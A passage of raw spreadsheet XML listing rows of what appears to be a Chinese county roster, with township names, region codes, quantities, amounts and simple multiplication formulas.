      <c r="D2584" s="14" t="s">
        <v>6777</v>
      </c>
      <c r="E2584" s="14" t="s">
        <v>6709</v>
      </c>
      <c r="F2584" s="14" t="s">
        <v>6698</v>
      </c>
      <c r="G2584" s="14">
        <v>1</v>
      </c>
      <c r="H2584" s="14">
        <v>340</v>
      </c>
      <c r="I2584" s="14">
        <f>H2584*G2584</f>
        <v>340</v>
      </c>
      <c r="J2584" s="14" t="s">
        <v>4838</v>
      </c>
      <c r="K2584" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2585" ht="23" customHeight="1" spans="1:11">
      <c r="A2585" s="13" t="s">
        <v>6778</v>
      </c>
      <c r="B2585" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2585" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2585" s="14" t="s">
        <v>6779</v>
      </c>
      <c r="E2585" s="14" t="s">
        <v>6780</v>
      </c>
      <c r="F2585" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2585" s="14">
        <v>1</v>
      </c>
      <c r="H2585" s="14">
        <v>340</v>
      </c>
      <c r="I2585" s="14">
        <f>H2585*G2585</f>
        <v>340</v>
      </c>
      <c r="J2585" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2585" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2586" ht="23" customHeight="1" spans="1:11">
      <c r="A2586" s="13" t="s">
        <v>6781</v>
      </c>
      <c r="B2586" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2586" s="14" t="s">
        <v>6782</v>
      </c>
      <c r="D2586" s="14" t="s">
        <v>6783</v>
      </c>
      <c r="E2586" s="14" t="s">
        <v>6784</v>
      </c>
      <c r="F2586" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2586" s="14">
        <v>2</v>
      </c>
      <c r="H2586" s="14">
        <v>300</v>
      </c>
      <c r="I2586" s="14">
        <f>H2586*G2586</f>
        <v>600</v>
      </c>
      <c r="J2586" s="24">
        <v>45474</v>
      </c>
      <c r="K2586" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2587" ht="23" customHeight="1" spans="1:11">
      <c r="A2587" s="13" t="s">
        <v>6785</v>
      </c>
      <c r="B2587" s="14" t="str">
        <f>B2586</f>
        <v>南河店镇</v>
      </c>
      <c r="C2587" s="14" t="str">
        <f>C2586</f>
        <v>南河店镇范庄村</v>
      </c>
      <c r="D2587" s="20" t="s">
        <v>6786</v>
      </c>
      <c r="E2587" s="20" t="s">
        <v>6787</v>
      </c>
      <c r="F2587" s="14" t="str">
        <f>F2586</f>
        <v>4113211004</v>
      </c>
      <c r="G2587" s="14"/>
      <c r="H2587" s="14"/>
      <c r="I2587" s="14"/>
      <c r="J2587" s="24"/>
      <c r="K2587" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2588" ht="23" customHeight="1" spans="1:11">
      <c r="A2588" s="13" t="s">
        <v>6788</v>
      </c>
      <c r="B2588" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2588" s="14" t="s">
        <v>6789</v>
      </c>
      <c r="D2588" s="14" t="s">
        <v>6790</v>
      </c>
      <c r="E2588" s="14" t="s">
        <v>6791</v>
      </c>
      <c r="F2588" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2588" s="14">
        <v>1</v>
      </c>
      <c r="H2588" s="14">
        <v>340</v>
      </c>
      <c r="I2588" s="14">
        <f t="shared" ref="I2588:I2593" si="123">H2588*G2588</f>
        <v>340</v>
      </c>
      <c r="J2588" s="24">
        <v>45717</v>
      </c>
      <c r="K2588" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2589" ht="23" customHeight="1" spans="1:11">
      <c r="A2589" s="13" t="s">
        <v>6792</v>
      </c>
      <c r="B2589" s="83" t="s">
        <v>6582</v>
      </c>
      <c r="C2589" s="83" t="s">
        <v>6789</v>
      </c>
      <c r="D2589" s="83" t="s">
        <v>6793</v>
      </c>
      <c r="E2589" s="83" t="s">
        <v>6794</v>
      </c>
      <c r="F2589" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2589" s="14">
        <v>1</v>
      </c>
      <c r="H2589" s="14">
        <v>340</v>
      </c>
      <c r="I2589" s="14">
        <f t="shared" si="123"/>
        <v>340</v>
      </c>
      <c r="J2589" s="24">
        <v>45505</v>
      </c>
      <c r="K2589" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2590" ht="23" customHeight="1" spans="1:11">
      <c r="A2590" s="13" t="s">
        <v>6795</v>
      </c>
      <c r="B2590" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2590" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2590" s="14" t="s">
        <v>6796</v>
      </c>
      <c r="E2590" s="14" t="s">
        <v>6401</v>
      </c>
      <c r="F2590" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2590" s="14">
        <v>1</v>
      </c>
      <c r="H2590" s="14">
        <v>340</v>
      </c>
      <c r="I2590" s="14">
        <f t="shared" si="123"/>
        <v>340</v>
      </c>
      <c r="J2590" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2590" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2591" ht="23" customHeight="1" spans="1:11">
      <c r="A2591" s="13" t="s">
        <v>6797</v>
      </c>
      <c r="B2591" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2591" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2591" s="14" t="s">
        <v>6799</v>
      </c>
      <c r="E2591" s="14" t="s">
        <v>6800</v>
      </c>
      <c r="F2591" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2591" s="14">
        <v>1</v>
      </c>
      <c r="H2591" s="14">
        <v>340</v>
      </c>
      <c r="I2591" s="14">
        <f t="shared" si="123"/>
        <v>340</v>
      </c>
      <c r="J2591" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2591" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2592" ht="23" customHeight="1" spans="1:11">
      <c r="A2592" s="13" t="s">
        <v>6802</v>
      </c>
      <c r="B2592" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2592" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2592" s="14" t="s">
        <v>6803</v>
      </c>
      <c r="E2592" s="14" t="s">
        <v>6804</v>
      </c>
      <c r="F2592" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2592" s="14">
        <v>1</v>
      </c>
      <c r="H2592" s="14">
        <v>340</v>
      </c>
      <c r="I2592" s="14">
        <f t="shared" si="123"/>
        <v>340</v>
      </c>
      <c r="J2592" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2592" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2593" ht="23" customHeight="1" spans="1:11">
      <c r="A2593" s="13" t="s">
        <v>6805</v>
      </c>
      <c r="B2593" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2593" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2593" s="14" t="s">
        <v>6806</v>
      </c>
      <c r="E2593" s="14" t="s">
        <v>6807</v>
      </c>
      <c r="F2593" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2593" s="14">
        <v>2</v>
      </c>
      <c r="H2593" s="14">
        <v>300</v>
      </c>
      <c r="I2593" s="14">
        <f t="shared" si="123"/>
        <v>600</v>
      </c>
      <c r="J2593" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2593" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2594" ht="23" customHeight="1" spans="1:11">
      <c r="A2594" s="13" t="s">
        <v>6808</v>
      </c>
      <c r="B2594" s="14" t="str">
        <f>B2593</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2594" s="14" t="str">
        <f>C2593</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2594" s="13" t="s">
        <v>6809</v>
      </c>
      <c r="E2594" s="13" t="s">
        <v>6810</v>
      </c>
      <c r="F2594" s="90" t="str">
        <f>F2593</f>
        <v>411321122001</v>
      </c>
      <c r="G2594" s="14"/>
      <c r="H2594" s="14"/>
      <c r="I2594" s="14"/>
      <c r="J2594" s="14"/>
      <c r="K2594" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2595" ht="23" customHeight="1" spans="1:11">
      <c r="A2595" s="13" t="s">
        <v>6811</v>
      </c>
      <c r="B2595" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2595" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2595" s="14" t="s">
        <v>6812</v>
      </c>
      <c r="E2595" s="14" t="s">
        <v>6813</v>
      </c>
      <c r="F2595" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2595" s="14">
        <v>1</v>
      </c>
      <c r="H2595" s="14">
        <v>340</v>
      </c>
      <c r="I2595" s="14">
        <f>H2595*G2595</f>
        <v>340</v>
      </c>
      <c r="J2595" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2595" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2596" ht="23" customHeight="1" spans="1:11">
      <c r="A2596" s="13" t="s">
        <v>6814</v>
      </c>
      <c r="B2596" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2596" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2596" s="14" t="s">
        <v>6815</v>
      </c>
      <c r="E2596" s="14" t="s">
        <v>1935</v>
      </c>
      <c r="F2596" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2596" s="14">
        <v>1</v>
      </c>
      <c r="H2596" s="14">
        <v>340</v>
      </c>
      <c r="I2596" s="14">
        <f>H2596*G2596</f>
        <v>340</v>
      </c>
      <c r="J2596" s="14">
        <v>45170</v>
      </c>
      <c r="K2596" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2597" ht="23" customHeight="1" spans="1:11">
      <c r="A2597" s="13" t="s">
        <v>6816</v>
      </c>
      <c r="B2597" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2597" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2597" s="14" t="s">
        <v>6817</v>
      </c>
      <c r="E2597" s="14" t="s">
        <v>6818</v>
      </c>
      <c r="F2597" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2597" s="14">
        <v>1</v>
      </c>
      <c r="H2597" s="14">
        <v>340</v>
      </c>
      <c r="I2597" s="14">
        <f>H2597*G2597</f>
        <v>340</v>
      </c>
      <c r="J2597" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2597" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2598" ht="23" customHeight="1" spans="1:11">
      <c r="A2598" s="13" t="s">
        <v>6819</v>
      </c>
      <c r="B2598" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2598" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2598" s="14" t="s">
        <v>6820</v>
      </c>
      <c r="E2598" s="14" t="s">
        <v>6821</v>
      </c>
      <c r="F2598" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2598" s="14">
        <v>2</v>
      </c>
      <c r="H2598" s="14">
        <v>300</v>
      </c>
      <c r="I2598" s="14">
        <f>H2598*G2598</f>
        <v>600</v>
      </c>
      <c r="J2598" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2598" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2599" ht="23" customHeight="1" spans="1:11">
      <c r="A2599" s="13" t="s">
        <v>6822</v>
      </c>
      <c r="B2599" s="14" t="str">
        <f>B2598</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2599" s="14" t="str">
        <f>C2598</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2599" s="18" t="s">
        <v>6823</v>
      </c>
      <c r="E2599" s="19" t="s">
        <v>6824</v>
      </c>
      <c r="F2599" s="90" t="str">
        <f>F2598</f>
        <v>411321122001</v>
      </c>
      <c r="G2599" s="14"/>
      <c r="H2599" s="14"/>
      <c r="I2599" s="14"/>
      <c r="J2599" s="14"/>
      <c r="K2599" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2600" ht="23" customHeight="1" spans="1:11">
      <c r="A2600" s="13" t="s">
        <v>6825</v>
      </c>
      <c r="B2600" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2600" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="D2600" s="14" t="s">
        <v>6826</v>
      </c>
      <c r="E2600" s="14" t="s">
        <v>6827</v>
      </c>
      <c r="F2600" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2600" s="14">
        <v>2</v>
      </c>
      <c r="H2600" s="14">
        <v>300</v>
      </c>
      <c r="I2600" s="14">
        <f>H2600*G2600</f>
        <v>600</v>
      </c>
      <c r="J2600" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2600" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2601" ht="23" customHeight="1" spans="1:11">
      <c r="A2601" s="13" t="s">
        <v>6828</v>
      </c>
      <c r="B2601" s="14" t="str">
        <f>B2600</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2601" s="14" t="str">
        <f>C2600</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2601" s="18" t="s">
        <v>6829</v>
      </c>
      <c r="E2601" s="18" t="s">
        <v>6830</v>
      </c>
      <c r="F2601" s="90" t="str">
        <f>F2600</f>
        <v>411321122001</v>
      </c>
      <c r="G2601" s="14"/>
      <c r="H2601" s="14"/>
      <c r="I2601" s="14"/>
      <c r="J2601" s="14"/>
      <c r="K2601" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2602" ht="23" customHeight="1" spans="1:11">
      <c r="A2602" s="13" t="s">
        <v>6831</v>
      </c>
      <c r="B2602" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2602" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2602" s="14" t="s">
        <v>6832</v>
      </c>
      <c r="E2602" s="14" t="s">
        <v>6833</v>
      </c>
      <c r="F2602" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2602" s="14">
        <v>1</v>
      </c>
      <c r="H2602" s="14">
        <v>340</v>
      </c>
      <c r="I2602" s="14">
        <f>H2602*G2602</f>
        <v>340</v>
      </c>
      <c r="J2602" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2602" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2603" ht="23" customHeight="1" spans="1:11">
      <c r="A2603" s="13" t="s">
        <v>6834</v>
      </c>
      <c r="B2603" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2603" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2603" s="14" t="s">
        <v>6835</v>
      </c>
      <c r="E2603" s="14" t="s">
        <v>6836</v>
      </c>
      <c r="F2603" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2603" s="14">
        <v>1</v>
      </c>
      <c r="H2603" s="14">
        <v>420</v>
      </c>
      <c r="I2603" s="14">
        <f>H2603*G2603</f>
        <v>420</v>
      </c>
      <c r="J2603" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2603" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2604" ht="23" customHeight="1" spans="1:11">
      <c r="A2604" s="13" t="s">
        <v>6837</v>
      </c>
      <c r="B2604" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2604" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2604" s="14" t="s">
        <v>6838</v>
      </c>
      <c r="E2604" s="14" t="s">
        <v>1163</v>
      </c>
      <c r="F2604" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2604" s="14">
        <v>1</v>
      </c>
      <c r="H2604" s="14">
        <v>340</v>
      </c>
      <c r="I2604" s="14">
        <f>H2604*G2604</f>
        <v>340</v>
      </c>
      <c r="J2604" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2604" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2605" ht="23" customHeight="1" spans="1:11">
      <c r="A2605" s="13" t="s">
        <v>6839</v>
      </c>
      <c r="B2605" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2605" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2605" s="14" t="s">
        <v>3154</v>
      </c>
      <c r="E2605" s="14" t="s">
        <v>3114</v>
      </c>
      <c r="F2605" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2605" s="14">
        <v>1</v>
      </c>
      <c r="H2605" s="14">
        <v>340</v>
      </c>
      <c r="I2605" s="14">
        <f>H2605*G2605</f>
        <v>340</v>
      </c>
      <c r="J2605" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2605" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2606" ht="23" customHeight="1" spans="1:11">
      <c r="A2606" s="13" t="s">
        <v>6840</v>
      </c>
      <c r="B2606" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2606" s="14" t="s">
        <v>6580</v>
      </c>
      <c r="D2606" s="14" t="s">
        <v>6841</v>
      </c>
      <c r="E2606" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F2606" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2606" s="14">
        <v>2</v>
      </c>
      <c r="H2606" s="14">
        <v>300</v>
      </c>
      <c r="I2606" s="14">
        <f>H2606*G2606</f>
        <v>600</v>
      </c>
      <c r="J2606" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2606" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2607" ht="23" customHeight="1" spans="1:11">
      <c r="A2607" s="13" t="s">
        <v>6842</v>
      </c>
      <c r="B2607" s="14" t="str">
        <f>B2606</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2607" s="14" t="str">
        <f>C2606</f>
        <v>外贸局</v>
      </c>
      <c r="D2607" s="14" t="s">
        <v>6843</v>
      </c>
      <c r="E2607" s="13" t="s">
        <v>6844</v>
      </c>
      <c r="F2607" s="90" t="str">
        <f>F2606</f>
        <v>411321122001</v>
      </c>
      <c r="G2607" s="14"/>
      <c r="H2607" s="14"/>
      <c r="I2607" s="14"/>
      <c r="J2607" s="14"/>
      <c r="K2607" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2608" ht="23" customHeight="1" spans="1:11">
      <c r="A2608" s="13" t="s">
        <v>6845</v>
      </c>
      <c r="B2608" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2608" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2608" s="14" t="s">
        <v>6846</v>
      </c>
      <c r="E2608" s="14" t="s">
        <v>6847</v>
      </c>
      <c r="F2608" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2608" s="14">
        <v>2</v>
      </c>
      <c r="H2608" s="14">
        <v>300</v>
      </c>
      <c r="I2608" s="14">
        <f>H2608*G2608</f>
        <v>600</v>
      </c>
      <c r="J2608" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2608" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2609" ht="23" customHeight="1" spans="1:11">
      <c r="A2609" s="13" t="s">
        <v>6848</v>
      </c>
      <c r="B2609" s="14" t="str">
        <f>B2608</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2609" s="14" t="str">
        <f>C2608</f>
        <v>工信局</v>
      </c>
      <c r="D2609" s="18" t="s">
        <v>6849</v>
      </c>
      <c r="E2609" s="18" t="s">
        <v>2533</v>
      </c>
      <c r="F2609" s="90" t="str">
        <f>F2608</f>
        <v>411321122001</v>
      </c>
      <c r="G2609" s="14"/>
      <c r="H2609" s="14"/>
      <c r="I2609" s="14"/>
      <c r="J2609" s="14"/>
      <c r="K2609" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2610" ht="23" customHeight="1" spans="1:11">
      <c r="A2610" s="13" t="s">
        <v>6850</v>
      </c>
      <c r="B2610" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2610" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2610" s="14" t="s">
        <v>6851</v>
      </c>
      <c r="E2610" s="14" t="s">
        <v>6852</v>
      </c>
      <c r="F2610" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2610" s="14">
        <v>2</v>
      </c>
      <c r="H2610" s="14">
        <v>300</v>
      </c>
      <c r="I2610" s="14">
        <f>H2610*G2610</f>
        <v>600</v>
      </c>
      <c r="J2610" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2610" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2611" ht="23" customHeight="1" spans="1:11">
      <c r="A2611" s="13" t="s">
        <v>6853</v>
      </c>
      <c r="B2611" s="14" t="str">
        <f>B2610</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2611" s="14" t="str">
        <f>C2610</f>
        <v>工信局</v>
      </c>
      <c r="D2611" s="13" t="s">
        <v>6854</v>
      </c>
      <c r="E2611" s="13" t="s">
        <v>6855</v>
      </c>
      <c r="F2611" s="90" t="str">
        <f>F2610</f>
        <v>411321122001</v>
      </c>
      <c r="G2611" s="14"/>
      <c r="H2611" s="14"/>
      <c r="I2611" s="14"/>
      <c r="J2611" s="14"/>
      <c r="K2611" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2612" ht="23" customHeight="1" spans="1:11">
      <c r="A2612" s="13" t="s">
        <v>6856</v>
      </c>
      <c r="B2612" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2612" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2612" s="14" t="s">
        <v>6857</v>
      </c>
      <c r="E2612" s="14" t="s">
        <v>6858</v>
      </c>
      <c r="F2612" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2612" s="14">
        <v>1</v>
      </c>
      <c r="H2612" s="14">
        <v>340</v>
      </c>
      <c r="I2612" s="14">
        <f>H2612*G2612</f>
        <v>340</v>
      </c>
      <c r="J2612" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2612" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2613" ht="23" customHeight="1" spans="1:11">
      <c r="A2613" s="13" t="s">
        <v>6859</v>
      </c>
      <c r="B2613" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2613" s="14" t="s">
        <v>6860</v>
      </c>
      <c r="D2613" s="14" t="s">
        <v>6861</v>
      </c>
      <c r="E2613" s="14" t="s">
        <v>6862</v>
      </c>
      <c r="F2613" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2613" s="14">
        <v>1</v>
      </c>
      <c r="H2613" s="14">
        <v>420</v>
      </c>
      <c r="I2613" s="14">
        <f>H2613*G2613</f>
        <v>420</v>
      </c>
      <c r="J2613" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K2613" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2614" ht="23" customHeight="1" spans="1:11">
      <c r="A2614" s="13" t="s">
        <v>6863</v>
      </c>
      <c r="B2614" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2614" s="14" t="s">
        <v>6864</v>
      </c>
      <c r="D2614" s="14" t="s">
        <v>6865</v>
      </c>
      <c r="E2614" s="14" t="s">
        <v>6866</v>
      </c>
      <c r="F2614" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2614" s="14">
        <v>1</v>
      </c>
      <c r="H2614" s="14">
        <v>340</v>
      </c>
      <c r="I2614" s="14">
        <f>H2614*G2614</f>
        <v>340</v>
      </c>
      <c r="J2614" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K2614" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2615" ht="23" customHeight="1" spans="1:11">
      <c r="A2615" s="13" t="s">
        <v>6867</v>
      </c>
      <c r="B2615" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2615" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2615" s="14" t="s">
        <v>6868</v>
      </c>
      <c r="E2615" s="14" t="s">
        <v>2259</v>
      </c>
      <c r="F2615" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2615" s="14">
        <v>1</v>
      </c>
      <c r="H2615" s="14">
        <v>340</v>
      </c>
      <c r="I2615" s="14">
        <f>H2615*G2615</f>
        <v>340</v>
      </c>
      <c r="J2615" s="14" t="s">
        <v>6869</v>
      </c>
      <c r="K2615" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2616" ht="23" customHeight="1" spans="1:11">
      <c r="A2616" s="13" t="s">
        <v>6870</v>
      </c>
      <c r="B2616" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2616" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2616" s="14" t="s">
        <v>6871</v>
      </c>
      <c r="E2616" s="14" t="s">
        <v>6872</v>
      </c>
      <c r="F2616" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2616" s="14">
        <v>2</v>
      </c>
      <c r="H2616" s="14">
        <v>300</v>
      </c>
      <c r="I2616" s="14">
        <f>H2616*G2616</f>
        <v>600</v>
      </c>
      <c r="J2616" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2616" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2617" ht="23" customHeight="1" spans="1:11">
      <c r="A2617" s="13" t="s">
        <v>6873</v>
      </c>
      <c r="B2617" s="14" t="str">
        <f>B2616</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2617" s="56" t="str">
        <f>C2616</f>
        <v>县社</v>
      </c>
      <c r="D2617" s="19" t="s">
        <v>6874</v>
      </c>
      <c r="E2617" s="19" t="s">
        <v>6875</v>
      </c>
      <c r="F2617" s="90" t="str">
        <f>F2616</f>
        <v>411321122001</v>
      </c>
      <c r="G2617" s="14"/>
      <c r="H2617" s="14"/>
      <c r="I2617" s="14"/>
      <c r="J2617" s="24"/>
      <c r="K2617" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2618" ht="23" customHeight="1" spans="1:11">
      <c r="A2618" s="13" t="s">
        <v>6876</v>
      </c>
      <c r="B2618" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2618" s="56" t="s">
        <v>3539</v>
      </c>
      <c r="D2618" s="56" t="s">
        <v>6877</v>
      </c>
      <c r="E2618" s="57" t="s">
        <v>6833</v>
      </c>
      <c r="F2618" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2618" s="14">
        <v>1</v>
      </c>
      <c r="H2618" s="14">
        <v>340</v>
      </c>
      <c r="I2618" s="14">
        <f t="shared" ref="I2618:I2625" si="124">H2618*G2618</f>
        <v>340</v>
      </c>
      <c r="J2618" s="24">
        <v>45566</v>
      </c>
      <c r="K2618" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2619" ht="23" customHeight="1" spans="1:11">
      <c r="A2619" s="13" t="s">
        <v>6878</v>
      </c>
      <c r="B2619" s="14" t="s">
        <v>6798</v>
      </c>
      <c r="C2619" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2619" s="14" t="s">
        <v>6879</v>
      </c>
      <c r="E2619" s="14" t="s">
        <v>2666</v>
      </c>
      <c r="F2619" s="90" t="s">
        <v>6801</v>
      </c>
      <c r="G2619" s="14">
        <v>1</v>
      </c>
      <c r="H2619" s="14">
        <v>340</v>
      </c>
      <c r="I2619" s="14">
        <f t="shared" si="124"/>
        <v>340</v>
      </c>
      <c r="J2619" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2619" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2620" ht="23" customHeight="1" spans="1:11">
      <c r="A2620" s="13" t="s">
        <v>6880</v>
      </c>
      <c r="B2620" s="14" t="s">
        <v>6881</v>
      </c>
      <c r="C2620" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2620" s="14" t="s">
        <v>6882</v>
      </c>
      <c r="E2620" s="14" t="s">
        <v>6883</v>
      </c>
      <c r="F2620" s="14" t="s">
        <v>6884</v>
      </c>
      <c r="G2620" s="14">
        <v>1</v>
      </c>
      <c r="H2620" s="14">
        <v>340</v>
      </c>
      <c r="I2620" s="14">
        <f t="shared" si="124"/>
        <v>340</v>
      </c>
      <c r="J2620" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2620" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2621" ht="23" customHeight="1" spans="1:11">
      <c r="A2621" s="13" t="s">
        <v>6885</v>
      </c>
      <c r="B2621" s="14" t="s">
        <v>6881</v>
      </c>
      <c r="C2621" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2621" s="14" t="s">
        <v>6886</v>
      </c>
      <c r="E2621" s="14" t="s">
        <v>6887</v>
      </c>
      <c r="F2621" s="14" t="s">
        <v>6884</v>
      </c>
      <c r="G2621" s="14">
        <v>1</v>
      </c>
      <c r="H2621" s="14">
        <v>340</v>
      </c>
      <c r="I2621" s="14">
        <f t="shared" si="124"/>
        <v>340</v>
      </c>
      <c r="J2621" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2621" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2622" ht="23" customHeight="1" spans="1:11">
      <c r="A2622" s="13" t="s">
        <v>6888</v>
      </c>
      <c r="B2622" s="14" t="s">
        <v>6881</v>
      </c>
      <c r="C2622" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2622" s="14" t="s">
        <v>6889</v>
      </c>
      <c r="E2622" s="14" t="s">
        <v>6890</v>
      </c>
      <c r="F2622" s="14" t="s">
        <v>6884</v>
      </c>
      <c r="G2622" s="14">
        <v>1</v>
      </c>
      <c r="H2622" s="14">
        <v>340</v>
      </c>
      <c r="I2622" s="14">
        <f t="shared" si="124"/>
